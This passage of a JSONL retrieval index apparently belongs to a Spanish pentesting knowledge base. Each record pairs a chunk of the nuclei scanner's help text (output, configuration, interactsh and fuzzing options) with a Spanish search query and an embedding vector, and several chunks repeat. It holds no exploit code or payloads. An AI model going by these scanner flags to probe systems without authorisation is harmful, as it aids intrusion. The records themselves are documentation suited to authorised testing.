-0.05683, -0.12391, -0.07573, -0.00768, 0.01782, -0.04235, -0.11471, 0.01, -0.00462, -0.01922, 0.04927, 0.00256, -0.05268, -0.01384, 0.04171, -0.01659, -0.03972, -0.01053, 0.01087, -0.02443, 0.03846, -0.04718, 0.03695, -0.02496, 0.01902, -0.01433, -0.01933, 0.1072, 0.06168, 0.07613, 0.06594, 0.04685, 0.08001, -0.00769, 0.0083, -0.02507, -0.09797, -0.04587, -0.04719, -0.03067, 0.08222, 0.05533, -0.09434, -0.01168, 0.00506, -0.01106, -0.08773, 0.01172, -0.04142, -0.00961, 0.00834, -0.03822, -0.02151, 0.10138, -0.10675, 0.00544, -0.00477, 0.02119, 0.05149, -0.00898, 0.07742, -0.03643, -0.0022, -0.06528, -0.00371, 0.0366, -0.00684, 0.00397, -0.00813, -0.05372, 0.0361, 0.00247, -0.06663, 0.03746, 0.00225, -0.01133, 0.04622, 0.0282, 0.00601, 0.0433, 0.00476, 0.04782, -0.04833, -0.02378, -0.00859, -0.01372, 0.00595, -0.08035, 0.00663, 0.0113, -0.02685, 0.04378, -0.02859, -0.04636, -0.0108, 0.01197, -0.00907, 0.03114, 0.00859, 0.00544, 0.00537, -0.08036, -0.0242, 0.06638, -0.00019, 0.02181, -0.04025, -0.04176, -0.04212, -0.0071, 0.02368, -0.01183, -0.02427, -0.05973, -0.06035, -0.02767, 0.05975, -0.01991, -0.04832, 0.02553, 0.02273, -0.02967, -0.03631, -0.00079, -0.01876]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OUTPUT:\n -o, -output string output file to write found issues/vulnerabilities\n -sresp, -store-resp store all request/response passed through nuclei to output directory\n -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default \"output\")\n -silent display findings only\n -nc, -no-color disable output content coloring (ANSI escape codes)\n -j, -jsonl write output in JSONL(ines) format\n -irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n -or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n -ot, -omit-template omit encoded template in the JSON, JSONL output\n -nm, -no-meta disable printing result metadata in cli output\n -ts, -timestamp enables printing timestamp in cli output\n -rdb, -report-db string nuclei reporting database (always use this to persist report data)\n -ms, -matcher-status display match failure status\n -me, -markdown-export string directory to export results in markdown format\n -se, -sarif-export string file to export results in SARIF format\n -je, -json-export string file to export results in JSON format\n -jle, -jsonl-export string file to export results in JSONL(ine) format\n -rd, -redact string[] redact given list of keys from query parameter, request header and body", "indexar": "cual es una herramienta para analizar ataques a aplicaciones web", "v": [-0.08006, 0.13706, -0.07704, -0.23571, 0.00437, -0.07888, -0.02103, 0.01309, -0.06481, 0.09906, -0.02779, -0.12583, -0.10533, -0.02501, 0.08091, 0.00049, 0.06993, -0.14229, 0.10685, 0.0443, -0.0019, 0.05542, -0.17136, 0.01229, -0.13852, 0.03909, 0.0141, 0.01023, -0.10752, -0.01032, -0.05634, 0.0055, 0.06158, -0.06733, -0.10497, -0.03095, -0.04641, 0.02191, 0.0291, 0.07173, -0.03307, -0.03429, -0.16839, -0.02817, 0.02765, 0.0146, -0.02271, -0.01547, 0.0154, 0.00512, 0.0099, -0.06082, -0.12766, 0.02356, 0.00294, -0.13336, 0.16268, -0.16179, 0.11598, -0.07554, -0.13944, 0.07569, -0.02254, -0.05393, 0.05532, -0.07566, 0.01802, 0.03079, -0.10654, 0.06739, 0.00637, 0.05709, -0.02347, 0.04795, 0.07674, 0.02487, 0.02369, 0.09676, 0.05528, -0.01485, 0.03354, -0.01122, -0.12694, 0.07659, -0.13538, -0.0589, 0.04882, -0.01353, 0.01467, -0.05373, 0.00432, 0.03317, -0.07747, -0.01604, -0.02642, -0.06536, 0.10702, -0.09695, 0.04382, 0.02062, 0.06845, -0.09216, -0.13529, 0.00725, -0.04355, 0.06295, -0.04782, -0.04117, -0.06714, -0.07306, -0.02562, -0.06004, 0.02858, -0.01503, 0.02233, -0.00892, -0.02583, -0.07909, -0.00371, -0.12209, -0.05181, 0.03503, -0.09293, -0.01916, -0.01529, 0.02418, 0.00407, 0.02669, -0.0451, -0.07508, 0.03054, -0.04762, -0.10221, 0.04698, -0.07815, 0.0142, 0.02563, -0.15734, 0.00381, -0.02527, 0.03277, 0.08499, -0.04691, -0.01321, 0.07898, 0.05402, -0.01653, -0.00098, -0.07928, 0.00377, 0.04164, -0.04499, -0.04088, 0.0351, -0.08588, -0.00962, -0.08301, -0.04237, -0.0919, 0.04189, -0.02, -0.03389, 0.00677, 0.00077, -0.01289, -0.06136, 0.04267, 0.03004, 0.12354, 0.08354, 0.02439, 0.06624, 0.04536, -0.06533, 0.02629, -0.07538, -0.03677, -0.05272, -0.00604, -0.11664, -0.05861, -0.07822, -0.01997, -0.00102, -0.02229, -0.03773, 0.04361, 0.00877, 0.00577, 0.05973, -0.01313, 0.0443, 0.00387, -0.01426, 0.09418, 0.00549, -0.02208, -0.08407, 0.00637, -0.01029, -0.0574, -0.05388, -0.05771, -0.04373, 0.02217, 0.11236, -0.00979, -0.03498, -0.03123, 0.0461, 0.00116, -0.00451, 0.04582, -0.00943, -0.03644, -0.08648, 0.05063, 0.04004, -0.02751, 0.01159, 0.01371, -0.0138, 0.02497, -0.01473, -0.02676, 0.03872, -0.02066, -0.03262, 0.00573, -0.01023, 0.01149, -0.07222, -0.02651, -0.03273, 0.01198, -0.0304, 0.03993, -0.02253, -0.08718, -0.00516, -0.02219, 0.05372, 0.00619, -0.02018, -0.05133, -0.06163, -0.0645, -0.02389, -0.04407, -0.07722, -0.01789, 0.04545, 0.06442, -0.01681, 0.04474, -0.02289]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CONFIGURATIONS:\n -config string path to the nuclei configuration file\n -tp, -profile string template profile config file to run\n -tpl, -profile-list list community template profiles\n -fr, -follow-redirects enable following redirects for http templates\n -fhr, -follow-host-redirects follow redirects on the same host\n -mr, -max-redirects int max number of redirects to follow for http templates (default 10)\n -dr, -disable-redirects disable redirects for http templates\n -rc, -report-config string nuclei reporting module configuration file\n -H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)\n -V, -var value custom vars in key=value format\n -r, -resolvers string file containing resolver list for nuclei\n -sr, -system-resolvers use system DNS resolving as error fallback\n -dc, -disable-clustering disable clustering of requests\n -passive enable passive HTTP response processing mode\n -fh2, -force-http2 force http2 connection on requests\n -ev, -env-vars enable environment variables to be used in template\n -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts\n -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts\n -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n -sml, -show-match-line show match lines for file templates, works with extractors only\n -ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n -sni string tls sni hostname to use (default: input domain name)\n -dka, -dialer-keep-alive value keep-alive duration for network requests.\n -lfa, -allow-local-file-access allows file (payload) access anywhere on the system\n -lna, -restrict-local-network-access blocks connections to the local / private network\n -i, -interface string network interface to use for network scan\n -at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n -sip, -source-ip string source ip address to use for network scan\n -rsr, -response-size-read int max response size to read in bytes\n -rss, -response-size-save int max response size to read in bytes (default 1048576)\n -reset reset removes all nuclei configuration and data files (including nuclei-templates)\n -tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization\n -hae, -http-api-endpoint string experimental http api endpoint", "indexar": "que programa puedo usar para hacer pruebas de penetraciΓ³n en servidores web", "v": [0.00988, 0.04389, -0.23822, -0.26283, 0.04048, -0.03444, 0.05588, -0.11186, 0.01905, -0.07667, -0.11439, 0.05505, -0.02418, -0.13217, -0.08434, 0.0643, 0.11675, -0.0778, 0.05591, 0.0407, 0.0138, 0.00862, -0.071, -0.02739, -0.06547, 0.17628, -0.01477, -0.04562, 0.00839, -0.05839, -0.08084, -0.03355, 0.0799, -0.02475, -0.03218, -0.01461, -0.02272, 0.08568, 0.07922, 0.15638, 0.05505, 0.00481, -0.06992, -0.03027, 0.0992, 0.02178, 0.08046, -0.10459, -0.05541, -0.05605, -0.03445, -0.02296, -0.04743, -0.04957, -0.06917, -0.09908, 0.01488, -0.14179, -0.06636, 0.01001, -0.06853, 0.00435, 0.00614, 0.01963, 0.05317, -0.05912, 0.05941, 0.05008, -0.09708, 0.04236, 0.01749, 0.0569, 0.0127, -0.1314, -0.06733, 0.02621, -0.04404, -0.06692, 0.05623, 0.00611, -0.02862, 0.06353, 0.02339, 0.05653, -0.18846, -0.05368, 0.02454, -0.05054, 0.05222, -0.07163, 0.04628, 0.10975, -0.00682, 0.08084, 0.06989, -0.08288, 0.16163, -0.04424, 0.05507, -0.02528, 0.12296, -0.00254, -0.05717, 0.08714, -0.05456, 0.05924, 0.08446, -0.02313, -0.00992, -0.07042, 0.05153, -0.05872, -0.1777, -0.07793, -0.11033, 0.02125, 0.02591, -0.07078, -0.0214, -0.05133, -0.10618, 0.02912, -0.03437, 0.01907, 0.03219, -0.04972, 0.07576, 0.01539, -0.09832, 0.01061, 0.08025, 0.02256, -0.08619, 0.02877, -0.03386, -0.04928, 0.03236, -0.04928, -0.00818, -0.0027, -0.00527, 0.05569, -0.05437, 0.02726, 0.02759, 0.03381, 0.00227, -0.03764, -0.09057, -0.00408, -0.03963, -0.04402, -0.09894, 0.07212, -0.08548, -0.06938, 0.06242, -0.04807, -0.07739, 0.03755, -0.04569, 0.01543, -0.0235, 0.07146, 0.09959, 0.0323, -0.0484, -0.0074, 0.03007, 0.04841, -0.014, 0.09771, 0.01901, -0.095, 0.05547, 0.01936, -0.05671, -0.0547, 0.01784, -0.01948, 0.00196, 0.04694, -0.02329, -0.0186, 0.01226, 0.00265, -0.02494, 0.01945, -0.01471, 0.03512, -0.00519, 0.0188, -0.02736, 0.08318, 0.07668, -0.00799, -0.01029, 0.04004, -0.02403, -0.08939, -0.02804, -0.06781, 0.0046, -0.05296, 0.00104, 0.04193, -0.04205, -0.02547, 0.0267, 0.06649, -0.01826, -0.02541, 0.08284, -0.06723, -0.05109, -0.02361, 0.04275, 0.02492, -0.04283, 0.00263, 0.00911, 0.01902, -0.00187, 0.06835, -0.00572, 0.02065, -0.00377, -0.0317, 0.02331, 0.01759, 0.01047, -0.02234, -0.01141, -0.04915, -0.00634, -0.06024, -0.03883, -0.00418, -0.03455, -0.07588, -0.05397, 0.10251, -0.00249, 0.01542, -0.01611, -0.05991, -0.04087, -0.03672, -0.03325, -0.0041, -0.00761, -0.01239, 0.00896, -0.06084, 0.02224, 0.04379]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CONFIGURATIONS:\n -config string path to the nuclei configuration file\n -tp, -profile string template profile config file to run\n -tpl, -profile-list list community template profiles\n -fr, -follow-redirects enable following redirects for http templates\n -fhr, -follow-host-redirects follow redirects on the same host\n -mr, -max-redirects int max number of redirects to follow for http templates (default 10)\n -dr, -disable-redirects disable redirects for http templates\n -rc, -report-config string nuclei reporting module configuration file\n -H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)\n -V, -var value custom vars in key=value format\n -r, -resolvers string file containing resolver list for nuclei\n -sr, -system-resolvers use system DNS resolving as error fallback\n -dc, -disable-clustering disable clustering of requests\n -passive enable passive HTTP response processing mode\n -fh2, -force-http2 force http2 connection on requests\n -ev, -env-vars enable environment variables to be used in template\n -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts\n -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts\n -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n -sml, -show-match-line show match lines for file templates, works with extractors only\n -ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n -sni string tls sni hostname to use (default: input domain name)\n -dka, -dialer-keep-alive value keep-alive duration for network requests.\n -lfa, -allow-local-file-access allows file (payload) access anywhere on the system\n -lna, -restrict-local-network-access blocks connections to the local / private network\n -i, -interface string network interface to use for network scan\n -at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n -sip, -source-ip string source ip address to use for network scan\n -rsr, -response-size-read int max response size to read in bytes\n -rss, -response-size-save int max response size to read in bytes (default 1048576)\n -reset reset removes all nuclei configuration and data files (including nuclei-templates)\n -tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization\n -hae, -http-api-endpoint string experimental http api endpoint", "indexar": "con quΓ© herramienta puedo verificar si mis servicios estΓ‘n expuestos pΓΊblicamente", "v": [0.09551, 0.30322, -0.18922, -0.10318, 0.09473, -0.10608, -0.04662, -0.04586, -0.07806, -0.21809, -0.11329, -0.08812, 0.02556, -0.05624, 0.15094, 0.06554, 0.06616, -0.12506, 0.07438, 0.08543, 0.05274, -0.05866, -0.04411, -0.09491, -0.09397, 0.03185, -0.06676, -0.08481, -0.12089, 0.0392, -0.00377, -0.00413, -0.05622, -0.03367, -0.05513, 0.00469, 0.0126, 0.06212, 0.04752, 0.03834, -0.01107, 0.01468, 0.05451, 0.01256, 0.00617, -0.05259, -0.11672, -0.10009, -0.06708, 0.07279, -0.0698, -0.10957, -0.17428, 0.03405, -0.05179, -0.11748, 0.06516, -0.00753, 0.03494, -0.04519, -0.05773, -0.00799, 0.00458, 0.02336, 0.03076, 0.02365, 0.03128, -0.00741, -0.03405, 0.04033, -0.0067, -0.01318, 0.08204, -0.04361, -0.10289, -0.04657, -0.03412, -0.00703, 0.03447, 0.01918, 0.00971, 0.08125, -0.00619, 0.03948, -0.13004, -0.1198, 0.00939, -0.08792, 0.0062, -0.11104, 0.02939, 0.13682, -0.05988, 0.03789, -0.01958, 0.08759, 0.02979, -0.00498, -0.049, -0.02429, 0.16127, -0.0125, -0.06123, -0.02414, -0.07948, -0.04352, -0.03166, -0.04269, -0.1242, -0.04286, 0.04679, -0.02435, -0.10118, -0.06887, -0.01342, 0.01131, -0.08615, -0.07352, -0.0261, -0.01327, 0.03206, -0.02335, -0.02514, -0.01261, 0.07678, -0.06411, -0.08942, 0.04191, -0.03988, 0.00702, 0.03198, -0.05814, -0.06359, 0.00665, -0.00178, -0.06929, -0.03072, -0.13356, 0.05187, -0.05574, 0.02782, -0.02254, 0.00699, -0.08341, 0.03353, 0.00931, -0.05224, -0.02076, -0.06974, -0.01751, 0.03278, -0.05832, 0.00527, 0.08819, -0.04292, 0.01644, -0.02238, -0.00872, -0.04295, -0.00028, -0.03341, -0.07506, 0.04902, 0.04598, 0.04224, 0.01473, 0.04048, 0.02495, 0.09106, 0.0334, 0.00035, 0.02394, 0.07201, -0.06965, 0.08621, -0.03894, -0.06641, -0.01833, 0.0475, -0.05556, -0.03355, -0.02069, -0.07564, -0.03616, -0.04032, -0.02971, 0.01766, -0.04234, 0.02246, -0.0001, 0.01585, 0.00643, 0.05264, -0.03812, 0.05594, -0.02241, 0.01606, -0.05177, 0.00203, -0.02916, -0.05629, -0.00102, -0.03899, -0.02523, -0.02149, 0.05955, 0.01969, -0.00425, -0.01599, 0.02762, 0.06117, -0.02002, 0.12192, -0.07268, -0.05216, -0.01094, -0.00621, 0.00443, -0.04327, -0.01667, 0.00962, -0.02152, 0.0594, -0.05407, 0.00716, 0.01168, 0.03773, 0.0174, 0.03356, 0.01785, 0.00562, -0.02899, -0.06978, 0.00036, 0.0363, -0.0414, 0.05793, -0.06703, -0.04962, -0.04489, 0.04019, 0.08698, 0.00572, -0.05757, 0.00113, -0.02642, -0.05037, -0.03418, 0.02721, -0.0673, -0.02442, 0.02646, 0.06249, -0.07943, 0.0338, -0.06641]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "INTERACTSH:\n -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n -itoken, -interactsh-token string authentication token for self-hosted interactsh server\n -interactions-cache-size int number of requests to keep in the interactions cache (default 5000)\n -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)\n -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)\n -interactions-cooldown-period int extra time for interaction polling before exiting (default 5)\n -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates", "indexar": "que herramienta sirve para detectar vulnerabilidades de inyecciΓ³n SQL en aplicaciones web?", "v": [0.02878, 0.00287, -0.1808, -0.28977, 0.05258, -0.19438, -0.15141, -0.07669, 0.07203, 0.07202, -0.0506, -0.10208, -0.06858, -0.10589, 0.00796, 0.07334, 0.03035, -0.22981, -0.02713, -0.0105, 0.03805, -0.00217, -0.08471, -0.0613, -0.1351, 0.09186, -0.02783, 0.00831, -0.05954, -0.05056, -0.08959, -0.06955, 0.06727, 0.01755, -0.1351, 0.00823, -0.09003, -0.01089, -0.00559, 0.02378, 0.0531, 0.0181, -0.12979, 0.01478, 0.07352, 0.0258, 0.03571, -0.0513, -0.00794, 0.03514, -0.06352, -0.07602, -0.17295, -0.05347, -0.04213, -0.08014, 0.14209, -0.06696, 0.09002, -0.05796, -0.15996, 0.038, 0.00411, -0.00647, 0.02646, -0.03366, 0.02793, 0.0122, -0.08307, 0.08382, -0.01817, 0.0065, 0.01467, -0.00029, 0.05797, -0.00241, 0.04152, 0.05422, 0.04969, -0.04207, -0.04792, 0.00177, -0.05407, 0.09031, -0.07109, -0.05132, 0.14406, 0.02953, 0.11344, -0.09315, 0.07823, 0.06197, -0.03662, 0.01135, 0.01557, -0.06566, 0.12111, -0.08719, 0.00951, 0.04312, 0.03322, -0.1087, -0.03019, 0.05561, 0.01401, 0.07465, 0.00044, -0.04065, -0.04251, -0.08282, 0.04144, -0.06666, -0.00308, -0.04857, 0.0069, 0.11093, 0.05766, 0.00304, -0.02274, -0.02531, -0.05387, -0.04183, -0.0585, -0.01812, -0.02969, -0.04459, -0.03908, 0.02538, -0.04149, -0.05076, 0.01525, -0.05677, -0.09706, 0.05666, -0.07254, 0.04804, 0.02858, -0.13814, -0.06028, 0.0056, 0.01567, 0.03784, -0.02232, -0.00965, 0.04471, 0.05641, 0.02504, 0.00691, -0.03535, 0.00708, 0.05402, -0.06154, -0.04332, 0.00699, -0.06994, -0.02565, -0.02922, -0.02792, -0.08808, 0.0356, -0.02394, 0.02277, -0.0144, 0.04658, -0.00499, -0.03978, 0.0666, 0.00871, 0.12376, 0.08815, 0.04369, 0.07168, 0.10132, -0.067, 0.01887, -0.01573, -0.01354, -0.01224, 0.05171, -0.12272, -0.02721, -0.07143, 0.00563, -0.01432, 0.03368, -0.02877, -0.01181, 0.01468, 0.0274, 0.02372, 0.00278, -0.00367, 0.00139, -0.03008, 0.08836, 0.02642, 0.00777, -0.05193, 0.03227, -0.04382, -0.06577, -0.05349, -0.0605, -0.02158, 0.02578, 0.07899, -0.00508, -0.00246, -0.00907, 0.03407, -0.00909, 0.02941, 0.02861, 0.01764, -0.01794, -0.10976, 0.02238, 0.06128, -0.01103, -0.00538, -0.03861, -0.04157, 0.03077, -0.02268, -0.01057, -0.01916, -0.03855, -0.05465, 0.02654, 0.01398, 0.05777, -0.04913, -0.03166, -0.00722, 0.02854, -0.06808, 0.00698, -0.00223, -0.04881, -0.04161, -0.00735, 0.03135, 0.01638, 0.00225, -0.02405, -0.04223, -0.01753, -0.03236, -0.03663, -0.06308, -0.05308, 0.03355, 0.08346, -0.03634, -0.00063, -0.0053]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "INTERACTSH:\n -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n -itoken, -interactsh-token string authentication token for self-hosted interactsh server\n -interactions-cache-size int number of requests to keep in the interactions cache (default 5000)\n -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)\n -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)\n -interactions-cooldown-period int extra time for interaction polling before exiting (default 5)\n -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates", "indexar": "con que puedo probar si una aplicaciΓ³n web es vulnerable a ataques XSS?", "v": [-0.0856, 0.05496, -0.18185, -0.09553, -0.06736, -0.02831, -0.05002, -0.03389, 0.06671, 0.05084, 0.00699, -0.07183, -0.04534, -0.01592, -0.04743, -0.018, 0.02035, -0.03531, 0.07017, 0.04204, 0.04417, -0.00902, -0.16833, -0.05953, 0.00972, 0.09646, -0.04682, 0.00051, -0.03119, -0.09183, -0.11721, -0.04283, 0.04599, 0.03141, -0.05139, 0.01662, -0.12452, 0.07407, 0.16467, 0.07055, 0.12035, -0.06829, -0.16347, -0.01235, 0.0683, 0.00861, -0.08229, 0.00075, -0.05388, -0.02844, 0.01899, -0.02529, -0.18977, -0.00856, -0.05621, -0.06821, 0.10475, -0.18422, 0.04745, 0.00538, -0.04727, 0.07069, 0.09397, -0.02171, 0.04804, -0.14713, 0.01799, 0.11642, -0.14248, 0.02826, -0.01409, -0.0003, -0.05523, 0.01246, 0.04164, -0.05724, 0.04044, 0.01873, 0.03475, -0.01396, 0.01, 0.02082, -0.08894, 0.05851, -0.13168, -0.07418, -0.00796, -0.08549, 0.00868, -0.15155, 0.16653, -0.01057, -0.02988, -0.04572, 0.01609, -0.07384, 0.06559, -0.04757, 0.03326, -0.04225, 0.01255, -0.06745, -0.10433, 0.01955, -0.05271, 0.00959, -0.00858, 0.02315, -0.02153, -0.16604, -0.01806, -0.11736, -0.0563, -0.01757, 0.01553, -0.04347, -0.06375, 0.00321, 0.03261, -0.05473, -0.08527, -0.02007, -0.05832, 0.04956, 0.05548, -4e-05, 0.02207, 0.03593, -0.04202, -0.03095, 0.00835, -0.0114, -0.03308, 0.055, -0.03626, 0.01374, 0.01851, -0.05555, -0.0007, 0.00068, 0.02507, 0.09425, 0.02011, 0.04796, 0.02817, 0.0725, -0.04368, 0.0702, -0.08162, -0.01075, -0.02585, -0.05309, -0.01257, 0.1008, -0.1589, -0.04173, -0.01136, -0.01213, 0.01279, 0.05803, -0.07946, 0.01982, -0.05809, 0.06485, -0.00507, 0.00429, 0.02648, -0.00038, 0.10395, 0.08932, -0.02129, 0.12436, 0.04804, -0.05895, 0.03158, -0.07181, -0.0705, -0.05419, 0.05842, -0.04801, -0.03713, -0.05382, -0.00542, 0.02269, 0.0025, -0.05444, 0.06679, 0.04005, 0.03699, 0.03727, -0.0547, 0.00299, -0.00392, 0.03741, 0.10227, -0.0934, -0.015, -0.01236, -0.05846, -0.06726, -0.05364, -0.05213, -0.02239, -0.07898, 0.0505, 0.05312, -0.03101, -0.01187, -0.04406, 0.07009, 0.03146, -0.0064, 0.10217, -0.00402, -0.05897, -0.05283, 0.06948, 0.02253, -0.03189, 0.02155, -0.05148, -0.03356, 0.04387, 0.0112, 0.04155, 0.01713, 0.00252, -0.0769, 0.02633, -0.00835, 0.01172, -0.07104, -0.07369, -0.02579, 0.05878, 0.02175, -0.02011, -0.00626, -0.08456, -0.03256, -0.00868, 0.08848, 0.01048, -0.0592, -0.01808, -0.09074, -0.08479, 0.01574, -0.004, -0.04677, 0.00185, 0.04666, 0.05815, -0.02047, -0.0024, 0.03682]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "INTERACTSH:\n -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n -itoken, -interactsh-token string authentication token for self-hosted interactsh server\n -interactions-cache-size int number of requests to keep in the interactions cache (default 5000)\n -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)\n -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)\n -interactions-cooldown-period int extra time for interaction polling before exiting (default 5)\n -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates", "indexar": "cual es la mejor forma de automatizar pruebas contra servidores propios para detectar fallos de seguridad?", "v": [-0.06154, -0.04469, -0.15456, -0.2161, -0.0236, -0.07167, 0.02856, -0.08272, -0.06896, -0.00877, -0.11417, -0.00389, -0.08636, -0.00081, 0.14091, -0.00422, 0.07183, -0.09768, 0.00898, 0.00139, 0.02334, -0.1474, 0.0186, -0.12764, -0.07338, 0.09535, -0.04068, -0.02999, -0.12181, -0.07522, 0.03004, -0.07801, 0.09839, -0.00032, -0.04745, 0.05132, -0.05543, 0.0874, 0.00454, 0.22555, 0.07147, 0.03277, -0.04193, -0.03497, 0.08637, -0.04059, -0.04344, -0.06526, 0.10567, -0.04991, -0.0371, -0.11612, 0.03841, -0.08324, -0.09115, -0.11862, 0.02737, 0.03269, 0.15335, -0.0851, -0.15073, -0.0067, 0.00013, 0.07652, 0.00336, -0.1068, 0.02808, -0.02689, -0.05747, -0.0886, 0.03638, -0.00971, 0.00707, 0.04343, -0.03074, 0.05747, -0.00295, 0.01976, 0.13295, 0.06693, -0.04737, 0.03793, -0.07952, 0.05762, -0.09154, -0.07684, -0.09227, -0.01259, -0.04571, 0.00484, 0.02661, 0.08076, 0.07044, 0.03723, 0.02177, -0.03437, 0.18228, -0.09489, -0.02731, -0.01489, 0.05789, -0.09071, -0.00331, 0.09104, -0.02164, 0.02695, -0.04682, 0.04292, 0.0842, -0.12923, -0.02857, -0.04033, -0.01766, 0.06105, -0.08524, -0.03231, 0.04455, -0.06445, -0.01255, 0.04964, -0.05756, -0.04639, -0.00128, -0.05557, 0.05238, -0.03658, 0.09864, 0.01841, 0.00255, -0.01186, 0.10472, 0.00959, -0.13611, -0.03925, -0.07302, 0.07758, 0.0369, -0.07683, -0.11041, -0.02726, 0.00818, 0.05295, 0.02184, -0.00845, 0.0595, 0.02263, -0.02518, -0.00936, -0.0633, 0.0277, -0.04621, -0.02165, -0.03051, -0.03258, -0.11724, 0.02793, -0.01983, -0.02124, -0.00365, 0.03732, 0.00834, 0.0123, 0.00484, 0.1149, 0.04082, 0.01179, 0.05394, 0.01187, 0.03234, -0.04454, 0.006, -0.00029, -0.02508, -0.09135, -0.03807, 0.03084, -0.04699, -0.03712, 0.05236, -0.0268, 0.01218, 0.00606, -0.04083, -0.01932, 0.04361, -0.06886, 0.04837, 0.01631, 0.08519, -0.02296, 0.04847, -0.01197, -0.07003, 0.03485, 0.04979, 0.02163, 0.01026, -0.04724, -0.02602, -0.01745, -0.03839, -0.05996, -0.03533, -0.01967, -0.00507, 0.01801, -0.0172, 0.0068, 0.05855, -0.03308, 0.06671, 0.01343, 0.13601, -0.09885, -0.08996, -0.00304, 0.02559, -0.00654, -0.06979, -0.03622, 0.00438, -0.00268, 0.00855, -0.006, -0.06607, 0.01873, 0.00435, 0.02477, 0.06254, -0.00953, 0.00644, 0.02016, -0.00988, -0.01557, -0.00888, -0.04186, 0.04396, -0.04824, 0.00477, -0.14848, 0.01142, 0.09569, 0.00753, -0.1129, -0.01364, -0.04126, -0.04733, -0.03475, -0.01018, -0.02978, 0.00746, 0.00556, 0.018, -0.02277, 0.01088, -0.02776]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FUZZING:\n -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)\n -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)\n -fuzz enable loading fuzzing templates (Deprecated: use -dast instead)\n -dast enable / run dast (fuzz) nuclei templates\n -dts, -dast-server enable dast server mode (live fuzzing)\n -dtr, -dast-report write dast scan report to file\n -dtst, -dast-server-token string dast server token (optional)\n -dtsa, -dast-server-address string dast server address (default \"localhost:9055\")\n -dfp, -display-fuzz-points display fuzz points in the output for debugging\n -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)\n -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default \"low\")\n -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer\n -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer", "indexar": "que programa sirve para probar vulnerabilidades en aplicaciones web", "v": [0.02471, 0.07596, -0.14583, -0.27017, 0.04456, -0.05289, 0.00955, -0.06052, -0.02222, -0.06156, 0.01613, -0.10496, -0.0385, -0.06144, -0.08368, 0.02585, 0.0495, -0.19047, 0.07717, 0.05235, 0.01361, 0.02857, -0.15283, -0.0779, -0.07699, 0.09185, 0.0154, -0.05555, 0.01002, -0.0358, -0.05522, -0.05354, 0.12135, -0.06259, -0.12148, 0.04213, -0.001, -0.06503, 0.04984, 0.05368, 0.11275, -0.02405, -0.03755, 0.03038, 0.041, 0.02299, 0.01302, -0.08047, -0.06181, -0.00892, -0.05144, -0.04029, -0.0711, 0.02465, 0.01715, -0.06037, 0.04263, -0.16476, 0.00839, 0.01933, -0.07976, 0.02513, 0.06635, -0.01027, 0.0846, -0.06533, 0.02166, 0.1177, -0.16027, 0.08011, 0.00029, 0.08114, 0.01927, -0.01015, -0.01493, 0.00559, -0.04609, -0.01374, 0.00555, -0.05616, -0.02107, 0.03288, -0.01421, 0.09844, -0.14708, -0.07256, 0.07325, 0.01754, 0.07962, -0.04281, 0.12542, 